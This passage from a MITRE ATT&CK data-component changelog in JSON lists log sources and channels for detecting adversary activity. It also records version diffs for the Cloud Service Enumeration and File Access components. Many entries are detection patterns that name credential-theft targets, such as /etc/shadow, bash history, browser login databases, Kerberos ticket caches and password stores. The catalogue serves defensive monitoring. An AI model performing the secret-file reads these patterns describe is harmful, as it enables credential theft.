                            "channel": "New-InboxRule: Automation that triggers abnormal forwarding or external link generation"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "MessageTrace logs"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "External sender message followed by user action involving links or attachments"
                        },
                        {
                            "name": "m365:mailboxaudit",
                            "channel": "Outlook rule creation or custom form deployment"
                        },
                        {
                            "name": "m365:messagetrace",
                            "channel": "AuthenticationDetails=fail OR SPF=fail OR DKIM=fail OR DMARC=fail"
                        },
                        {
                            "name": "m365:messagetrace",
                            "channel": "X-MS-Exchange-Organization-AutoForwarded"
                        },
                        {
                            "name": "m365:purview",
                            "channel": "MailItemsAccessed & Exchange Audit"
                        },
                        {
                            "name": "m365:purview",
                            "channel": "MailItemsAccessed, Search-Mailbox events"
                        },
                        {
                            "name": "m365:teams",
                            "channel": "External chat request or new tenant communication preceding approval activity"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Unusual form activity within Outlook client, including load of non-default forms"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "SendOnBehalf, MessageSend, ClickThrough, MailItemsAccessed"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "SendOnBehalf, MessageSend, AttachmentPreviewed"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Send/Receive: Emails with suspicious sender domains, spoofed headers, or anomalous attachment types"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "FileAccessed: Access of email attachments by Office applications"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Creation or modification of inbox rule outside of normal user behavior"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Send/Receive: Inbound emails containing embedded or shortened URLs"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "AppRegistration: Unexpected application registration or OAuth authorization"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "MessageSend, MessageRead, or FileAttached events containing credential-like patterns"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-Mailbox, Add-InboxRule, RegisterWebhook"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "ConsentGranted: Abuse of application integrations to mint tokens bypassing MFA"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Application Consent grants, new OAuth client registrations, or unusual admin-level activities executed by a user account shortly after suspected drive-by compromise"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Folder configuration updated with external or HTML-formatted Home Page via Set-MailboxFolder"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "PurgeAuditLogs, Remove-MailboxAuditLog"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-CsOnlineUser or UpdateAuthPolicy"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "New-InboxRule or Set-InboxRule events recorded in Exchange Online"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Transport rule or inbox rule creation events"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "GAL Lookup or Address Book download"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Send/Receive: Inbound emails with attachments from suspicious or spoofed senders"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "certificate added or modified in application credentials"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Unusual MFA requests or OAuth consent events temporally aligned with user-reported vishing call"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set federation settings on domain|Set domain authentication|Add federated identity provider"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "SendOnBehalf/SendAs: Emails sent where the sending identity mismatches account ownership"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-MailboxAutoReplyConfiguration: Unexpected rule changes creating impersonated replies"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "SendOnBehalf/SendAs: Office Suite initiated messages using impersonated identities"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Read-only configuration review from GUI"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Modify Federation Settings or Update Authentication Policy"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Send/Receive: Unusual spikes in inbound messages to a single recipient"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "PowerShell: Add-MailboxPermission"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Add-MailboxPermission or Set-ManagementRoleAssignment"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-PartnerOfRecord / CompanyAdministrator role assignments / New-DelegatedAdminRelationship"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Add-DelegatedAdmin, Set-PartnerOfRecord, Add-MailboxPermission, Set-OrganizationRelationship"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "MailSend: Outlook messages with suspicious subject/body terms (e.g., urgent payment, wire transfer) targeting finance teams"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "FileAccessed, FileDownloaded, SearchQueried"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Detection of hidden macro streams or SetHiddenAttribute actions"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "RunMacro"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "FileUploaded or FileCopied events"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "TeamsMessageAccess, TeamsExport, ExternalAppAccess"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "TeamsMessagesAccessedViaEDiscovery, TeamsGraphMessageExport"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "FileAccessed"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "ApplicationModified, ConsentGranted: Unexpected app consent or modification events linked to security evasion"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "MailItemsAccessed; AddedInboxRule; ConsentToApplication; SharingSet"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-AdminAuditLogConfig;New-ApplicationAccessPolicy;ConsentToApplication"
                        },
                        {
                            "name": "macos:jamf",
                            "channel": "RemoteCommandExecution"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Device attached|enumerated VID/PID"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Inbound email activity with suspicious domains or mismatched sender information"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "App/web server logs ingested via unified logging or filebeat (nginx/apache/node)."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Received messages with embedded or shortened URLs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Received messages containing embedded links or attachments from non-enterprise services"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process 'crashed'|'EXC_BAD_ACCESS' for sshd, screensharingd, httpd; launchd restarts of these daemons."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "opendirectoryd crashes or abnormal authentication errors"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Logs from unifiedlogging that show browser crashes, plugin enumerations, extension installs or errors around the same time as suspicious network fetches"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream cleared or truncated"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "quarantine or AV-related subsystem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Repeated process crashes logged by CrashReporter or system instability logs in com.apple.console"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Inbound messages with attachments from suspicious domains"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Outgoing or incoming calls with non-standard caller IDs or unusual metadata"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Mail.app or third-party clients sending messages with mismatched From headers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process crash, abort, code signing violations"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Configuration profile modified or new profile installed"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Crash log entries for a process receiving malformed input or known exploit patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Repetitive inbound email delivery activity logged within a short time window"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Application errors or resource contention from excessive frontend or script invocation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "SPF fail OR DKIM fail OR DMARC fail OR mismatched header vs envelope domains"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "new DHCP configuration with anomalous DNS or router values"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Mail or AppleScript subsystem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "opened document|clicked link|EXC_BAD_ACCESS|abort|LSQuarantine"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Anomalous keychain access attempts targeting payment credentials"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Abnormal terminations of com.apple.security.* or 3rd-party security daemons"
                        },
                        {
                            "name": "networkdevice:controlplane",
                            "channel": "Syslog from edge devices with HTTP 500s on mgmt portal, SmartInstall events, unexpected CLI commands"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "config push events"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "SIP REGISTER, INVITE, or unusual call destination metadata"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Failed authentication requests redirected to non-standard portals"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "PushNotificationSent"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Failed password or accepted password for SSH users"
                        },
                        {
                            "name": "saas:Airtable",
                            "channel": "EXPORT: User-triggered data export via GUI or API"
                        },
                        {
                            "name": "saas:application",
                            "channel": "High-frequency invocation of SMS-related API endpoints from publicly accessible OTP or verification forms (e.g., Twilio: SendMessage, Cognito: AdminCreateUser) with irregular destination patterns."
                        },
                        {
                            "name": "saas:application",
                            "channel": "High-volume API calls or traffic via messaging or webhook service"
                        },
                        {
                            "name": "saas:audit",
                            "channel": "Rule/ConfigChange: Auto-forward rules, delegate assignments, or changes to financial approval workflows"
                        },
                        {
                            "name": "saas:audit",
                            "channel": "Application added or consent granted: Integration persisting after original user disabled"
                        },
                        {
                            "name": "saas:box",
                            "channel": "User navigated to admin interface"
                        },
                        {
                            "name": "saas:collaboration",
                            "channel": "MessagePosted: Suspicious links or attachment delivery via collaboration tools (Slack, Teams, Zoom)"
                        },
                        {
                            "name": "saas:confluence",
                            "channel": "access.content"
                        },
                        {
                            "name": "saas:email",
                            "channel": "AuthenticationFailures (SPF/DKIM/DMARC) OR Domain Mismatch"
                        },
                        {
                            "name": "saas:finance",
                            "channel": "Transaction/Transfer: Unusual or large transactions initiated outside business hours or by unusual accounts"
                        },
                        {
                            "name": "saas:github",
                            "channel": "Bulk access to multiple files or large volume of repo requests within short time window"
                        },
                        {
                            "name": "saas:gmail",
                            "channel": "SendEmail, OpenAttachment, ClickLink"
                        },
                        {
                            "name": "saas:googledrive",
                            "channel": "FileOpen / FileAccess: Event-driven script triggering on user file actions"
                        },
                        {
                            "name": "saas:googleworkspace",
                            "channel": "OAuth2 authorization grants / Admin role assignments"
                        },
                        {
                            "name": "saas:hubspot",
                            "channel": "contact_viewed, contact_exported, login"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "Conditional Access policy rule modified or MFA requirement disabled"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "MFAChallengeIssued"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "WebUI access to administrator dashboard"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "Federation configuration update or signing certificate change"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "System API Call: user.read, group.read"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "policy.rule.update;system.log.disable;admin.role.assign"
                        },
                        {
                            "name": "saas:openai",
                            "channel": "High volume of requests to /v1/chat/completions or /v1/images/generations"
                        },
                        {
                            "name": "saas:salesforce",
                            "channel": "DataExport, RestAPI, Login, ReportExport"
                        },
                        {
                            "name": "saas:slack",
                            "channel": "file_upload, message_send, message_click"
                        },
                        {
                            "name": "saas:slack",
                            "channel": "chat.postMessage, files.upload, or discovery API calls involving token/credential regex"
                        },
                        {
                            "name": "saas:slack",
                            "channel": "OAuth token use by unknown app client_id accessing private channels or files"
                        },
                        {
                            "name": "saas:slack",
                            "channel": "conversations.history, files.list, users.info, audit_logs"
                        },
                        {
                            "name": "saas:slack",
                            "channel": "xternal DM or workspace invite preceding credential or approval actions"
                        },
                        {
                            "name": "saas:Snowflake",
                            "channel": "QUERY: Large or repeated SELECT * queries to sensitive tables"
                        },
                        {
                            "name": "saas:teams",
                            "channel": "ChatMessageSent, ChatMessageEdited, LinkClick"
                        },
                        {
                            "name": "saas:zoom",
                            "channel": "unusual web session tokens and automation patterns during login"
                        },
                        {
                            "name": "saas:zoom",
                            "channel": "Unexpected contact interaction preceding follow-on admin requests"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Outlook errors loading or processing custom form templates"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Office Add-in load errors, abnormal loading context, or unsigned add-in warnings"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Outlook rule execution failure or abnormal rule execution context"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Exchange Transport Service loads unusual .NET assembly or errors upon transport agent execution"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Unexpected spikes in request volume, application-level errors, or thread pool exhaustion in web or API logs"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Browser or plugin/application logs showing script errors, plugin enumerations, or unusual extension load events"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Outlook logs indicating failure to load or render HTML page in Home Page view"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "EventCode=1000"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Service crash, unhandled exception, or application hang warnings for critical services (e.g., IIS, DNS, SQL Server)"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "SCCM, Intune logs"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Unexpected web application errors or CMS logs showing modification to index.html, default.aspx, or other public-facing files"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "VPN, Citrix, or remote access gateway logs showing external IP addresses"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Outlook rule creation, form load, or homepage redirection"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "High-frequency errors or hangs from resource-intensive application components (e.g., .NET, IIS, Office Suite)"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Exchange logs or header artifacts"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Unusual DLL/plugin registration for IIS/SQL/Apache or unexpected error logs"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=6416"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=1102"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "Changes to applicationhost.config or DLLs loaded by w3wp.exe"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "Device started/installed (UMDF) GUIDs"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=1000"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=104"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=1341, 1342, 1020, 1063"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 19:46:47.171000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"android:logcat\", \"channel\": \"Default IME active or bound to <pkg> (InputMethodManager reports imeId=<pkg>)\"}, \"root['x_mitre_log_sources'][1]\": {\"name\": \"android:logcat\", \"channel\": \"Default IME changed/active: imeId=<pkg>, onStartInput/onFinishInput high frequency. TYPE_APPLICATION_OVERLAY|addView .* showing on top of package <otherPkg>\"}, \"root['x_mitre_log_sources'][2]\": {\"name\": \"android:logcat\", \"channel\": \"Default IME active imeId=<pkg>; frequent onStartInput/commitText calls\"}, \"root['x_mitre_log_sources'][3]\": {\"name\": \"android:logcat\", \"channel\": \"addView TYPE_APPLICATION_OVERLAY|TYPE_APPLICATION_ATTACHED_DIALOG shown over <target_pkg>\"}, \"root['x_mitre_log_sources'][4]\": {\"name\": \"android:logcat\", \"channel\": \"Secure/Global reads of device_policy_manager, accessibility_enabled, default_vpn, always_on_vpn\"}, \"root['x_mitre_log_sources'][5]\": {\"name\": \"android:logcat\", \"channel\": \"Task switch from browser/custom tab to handler immediately after OAuth return\"}, \"root['x_mitre_log_sources'][6]\": {\"name\": \"android:logcat\", \"channel\": \"ACTION_OPEN_DOCUMENT_TREE / ACTION_OPEN_DOCUMENT invoked without user gesture or repeatedly in background\"}, \"root['x_mitre_log_sources'][53]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Repeated or large UIPasteboard reads; background pasteboard access shortly before packaging\"}, \"root['x_mitre_log_sources'][54]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"UIPasteboard read (general/string/data) by <bundle_id>; repeated reads or background access\"}, \"root['x_mitre_log_sources'][55]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"UIWindow/UIView events indicating secure text entry focus, editingChanged bursts, unexpected firstResponder cycling\"}, \"root['x_mitre_log_sources'][56]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Secure text entry focus and editingChanged bursts not typical for the app\"}, \"root['x_mitre_log_sources'][57]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Presentation of credential-like view (UIAlertController with text fields / custom modal) not backed by system auth controller; frequent editingChanged in secureTextEntry fields\"}, \"root['x_mitre_log_sources'][58]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Repeated canOpenURL checks across diverse schemes (\\u2265N within short window)\"}, \"root['x_mitre_log_sources'][59]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"UIDocumentPickerViewController presented repeatedly without foreground interaction or with short dwell time\"}, \"root['x_mitre_log_sources'][60]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"repeated sandbox denials related to restricted process/system interfaces consistent with process-table querying attempts\"}, \"root['x_mitre_log_sources'][61]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"security-relevant kernel log messages indicating restricted system interface access attempts by app process (device-dependent visibility)\"}, \"root['x_mitre_log_sources'][91]\": {\"name\": \"m365:exchange\", \"channel\": \"External sender message followed by user action involving links or attachments\"}, \"root['x_mitre_log_sources'][97]\": {\"name\": \"m365:teams\", \"channel\": \"External chat request or new tenant communication preceding approval activity\"}, \"root['x_mitre_log_sources'][139]\": {\"name\": \"m365:unified\", \"channel\": \"MailItemsAccessed; AddedInboxRule; ConsentToApplication; SharingSet\"}, \"root['x_mitre_log_sources'][140]\": {\"name\": \"m365:unified\", \"channel\": \"Set-AdminAuditLogConfig;New-ApplicationAccessPolicy;ConsentToApplication\"}, \"root['x_mitre_log_sources'][193]\": {\"name\": \"saas:okta\", \"channel\": \"policy.rule.update;system.log.disable;admin.role.assign\"}, \"root['x_mitre_log_sources'][200]\": {\"name\": \"saas:slack\", \"channel\": \"xternal DM or workspace invite preceding credential or approval actions\"}, \"root['x_mitre_log_sources'][204]\": {\"name\": \"saas:zoom\", \"channel\": \"Unexpected contact interaction preceding follow-on admin requests\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.274000+00:00",
                    "modified": "2026-02-23 19:38:20.657000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0083",
                            "external_id": "DC0083"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Cloud Service Enumeration",
                    "description": "Cloud service enumeration involves listing or querying available cloud services in a cloud control plane. This activity is often performed to identify resources such as virtual machines, storage buckets, compute clusters, or other services within a cloud environment. Examples include API calls like `AWS ECS ListServices`, `Azure ListAllResources`, or `Google Cloud ListInstances`. Examples: \n\nAWS Cloud Service Enumeration: The adversary gathers details about existing ECS services to identify opportunities for privilege escalation or exfiltration.\n- Azure Resource Enumeration: The adversary collects information about virtual machines, resource groups, and other Azure assets for reconnaissance purposes.\n- Google Cloud Resource Enumeration: The attacker seeks to map the environment and find misconfigured or underutilized resources for exploitation.\n- Office 365 Service Enumeration: The attacker may look for data repositories or collaboration tools to exfiltrate sensitive information.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "GetSecretValue"
                        },
                        {
                            "name": "gcp:secrets",
                            "channel": "accessSecretVersion"
                        },
                        {
                            "name": "azure:ad",
                            "channel": "SecretGet"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "ssm:ListInventoryEntries"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "DescribeInstances, DescribeServices, ListFunctions: High frequency enumeration calls or unusual user agents performing discovery"
                        },
                        {
                            "name": "azure:audit",
                            "channel": "ListApplications, ListServicePrincipals: Large-scale queries against identity or application objects"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Get-MsolServicePrincipal, ListAppRoles: Service discovery operations executed by accounts not normally performing administrative tasks"
                        },
                        {
                            "name": "saas:adminapi",
                            "channel": "ListIntegrations, ListServices: Repeated service discovery requests from accounts without administrative responsibilities"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "GetInstanceIdentityDocument or IMDSv2 token requests"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "DescribeUsers / ListUsers / GetUser"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Graph API Query"
                        },
                        {
                            "name": "saas:MDM",
                            "channel": "Device lookup, location query, or remote management operation"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-23 19:38:20.657000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0083\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0083\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][11]\": {\"name\": \"saas:MDM\", \"channel\": \"Device lookup, location query, or remote management operation\"}, \"root['x_mitre_domains'][1]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-23 18:39:07.536000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0055",
                            "external_id": "DC0055"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "File Access",
                    "description": "To events where a file is opened or accessed, making its contents available to the requester. This includes reading, executing, or interacting with files by authorized or unauthorized entities. Examples include logging file access events (e.g., Windows Event ID 4663), monitoring file reads, and detecting unusual file access patterns. Examples: \n\n- File Read Operations: A user opens a sensitive document (e.g., financial_report.xlsx) on a shared drive.\n- File Execution: A script or executable file is accessed and executed (e.g., malware.exe is run from a temporary directory).\n- Unauthorized File Access: An unauthorized user attempts to access a protected configuration file (e.g., `/etc/passwd` on Linux or `System32` files on Windows).\n- File Access Patterns: Bulk access to multiple files in a short time (e.g., mass access to documents on a file server).\n- File Access via Network: Files on a network share are accessed remotely (e.g., logs of SMB file access).",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "macOS:unifiedlog",
                            "channel": "looking for file access to scripts with abnormal encoding patterns"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "READ or COPY operations where path matches external/shared locations of other apps (e.g., /storage/emulated/0/Android/data/<otherpkg>/files/, /storage/emulated/0/Download/<app>/*)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "KeyChain/AndroidKeyStore read of token alias"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "READ/LIST/STAT of /sdcard|/storage/emulated/0|/Android/media|/Documents with >N distinct paths in TimeWindow"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "/home/*/.mozilla/firefox/*/logins.json OR /home/*/.config/google-chrome/*/Login Data"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "/proc/*/mem read attempt"
                        },
                        {
                            "name": "auditd:FS",
                            "channel": "read: File access to /proc/modules or /sys/module/"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "Read access to known backup software configuration files (e.g., /etc/rsnapshot.conf, /opt/veeam/config.ini)"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "open: Access to sensitive log files (/var/log/auth.log, /var/log/secure, /var/log/syslog)"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "PATH"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "file read"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, read, or stat of browser config files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open: File access attempt on /tmp/krb5cc_* or /tmp/krb5.ccache"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "openat"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, read"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, flock, fcntl, unlink"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "read/open of sensitive files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Unusual processes accessing or modifying cookie databases"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "PATH records referencing /dev/video*"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, read: /etc/ssl/, /etc/pki/, ~/.pki/nssdb/"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Processes reading credential or token cache files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "read/open of sensitive file directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read of sensitive config or secret files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read of sensitive directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read: Access to /proc/self/status with focus on TracerPID field"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read access to ~/.bash_history"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open,read"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read system calls to ~/.bash_history or /etc/shadow"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "read of /run/secrets or docker volumes by non-entrypoint process"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Reads of ~/.bash_history, ~/.mozilla, or access to /dev/input"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open: Access to named pipes or FIFO in /tmp or /dev/shm by unexpected processes"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open or read to browser cookie storage"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, read, mount"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "file"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Access to /var/lib/sss/secrets/secrets.ldb or .secrets.mkey"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read of sensitive directories (/etc, /home/*)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "PATH"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read on ~/.local/share/keepassxc/* OR ~/.password-store/*"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "attempts to read /proc/* entries at scale (openat/getdents64/readlink) or access denied for /proc traversal; correlate to app UID"
                        },
                        {
                            "name": "azure:activity",
                            "channel": "CollectGuestLogs: Unexpected collection of guest logs by Azure VM Agent outside normal maintenance windows"
                        },
                        {
                            "name": "CloudTrail:GetObject",
                            "channel": "sensitive credential files in buckets or local image storage"
                        },
                        {
                            "name": "desktop:file_manager",
                            "channel": "nautilus, dolphin, or gvfs logs"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "container_file_activity"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "open/read on secret mount paths"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "datastore file access"
